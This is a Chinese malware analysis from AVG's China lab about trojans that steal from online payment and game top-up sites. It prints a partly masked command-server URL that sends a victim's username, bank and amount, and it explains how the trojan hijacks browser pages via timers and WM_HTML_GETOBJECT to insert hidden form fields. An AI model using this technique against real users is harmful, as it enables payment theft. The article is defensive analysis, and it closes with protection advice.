岁末将至,一年一度的促销狂潮也陆续到来,各大网购网站施展浑身解数来吸引客户。据最新数据显示:仅国内著名的网购平台淘宝在12月12日推出的全民疯抢活动,一个小时内,成交额就达到了4.75亿,成交量278万笔。令人眼花缭乱的促销手段吸引来的不仅是诸多的网购达人,更吸引了众多黑客的目光。在最近一段时间内,AVG中国病毒实验室截获大量针对国内各种支付平台的病毒,包括:百联,盛付通,快钱,讯付,易宝,支付宝等。同时针对的范围也有所扩大,除了网购网站之外,一些游戏公司的充值网站也在此类木马的攻击范围之列,如:完美,多玩,4399网络游戏,征途游戏等。此类木马大多是由某种生成器生成,并且木马的作者提供后台的管理系统。
此类病毒的传播手段没有很明显的变化,大多还是利用社会工程学伪装成word文档,图片文件,或者文本文件,诱导用户点击。对于攻击的手段主要有窃取用户的支付账户的密码,修改用户的支付账户。下面让我们来近距离来接触此类木马,揭开它的神秘面纱。
目前截获的一些样本中大多数具有word文档的图标。这类文件可能是以邮件附件的形式存在,也有可能是卖家发送产品信息。在运行过程中此类木马会首先连接到baidu,以确定当前的网络状况。然后连接到病毒后台的服务器。发出的请求的形式如下:
http://119.***.***.48:858/Api/163/Post.Php?UserName=aucodehu&Bank=ICBC&Money=88(链接已经处理)
通过以上用户名以及银行信息,可以进行管理和分赃。随后木马会简单的收集一下系统的信息然后发送到相同的后台系统。
包括本机的ip,操作系统版本,以及地理位置。
在进行完以上的准备活动后,此木马就开始监控用户的所浏览的网址,区别于以往的代码注入,或者劫持API之类的手法,此类木马使用了一种更为简便而且行之有效的方法:定时器。而这种手段可能被某些主动防御所忽略。此类木马一般设置了三个或以上的定时器。触发的时间间隔是200毫秒。这个时间间隔足以监控到用户对网站的操作。其中一个定时器,会通过GetCursorPos获得当前鼠标的位置,进而获得当前窗口的句柄。然后通过向Webbrowser控件(窗口类名是"Internet Explorer_Server")发一个WM_HTML_GETOBJECT的消息获得IHTMLDocument对象。获得此对象后,木马作者就可以对该页面进行任何操作:解析该页面元素,窃取自己感兴趣的任何内容,篡改支付信息等等,以下是在病毒中截取到的一个字符串的片段:
同时也会在页面中添加一些属性为隐藏的标签,这些标签是不会显示在页面中,但是却是真正起作用的部分:
一旦点击提交,这些页面中隐藏的内容将被提交,用户就会面临着信息失窃,财产损失。同时病毒还设置其它的定时器。用来关闭支付网站对用户环境检查的以及用户支付失败的页面。
对于此类木马的防范,应该注意以下几点:
1. 保持杀毒软件的及时更新。
2. 不打开任何不是自己主动索取的文件。
3. 检查文件的类型是否和图标以及后缀一致。
4. 网购时如果发现任何用户支付环境检查的页面被关闭,立即停止支付。
5. 检查支付页面是否被修改。
AVG已经可以检测此类病毒,用户们只要不关闭更新,保持病毒库在当前最新状态,就可以有效阻止该木马的侵袭。同时,AVG中国实验室借此提醒广大网友,年底是各种网络病毒爆发的高危期,平时网上冲浪特别是涉及财产交易时一定要谨慎再谨慎。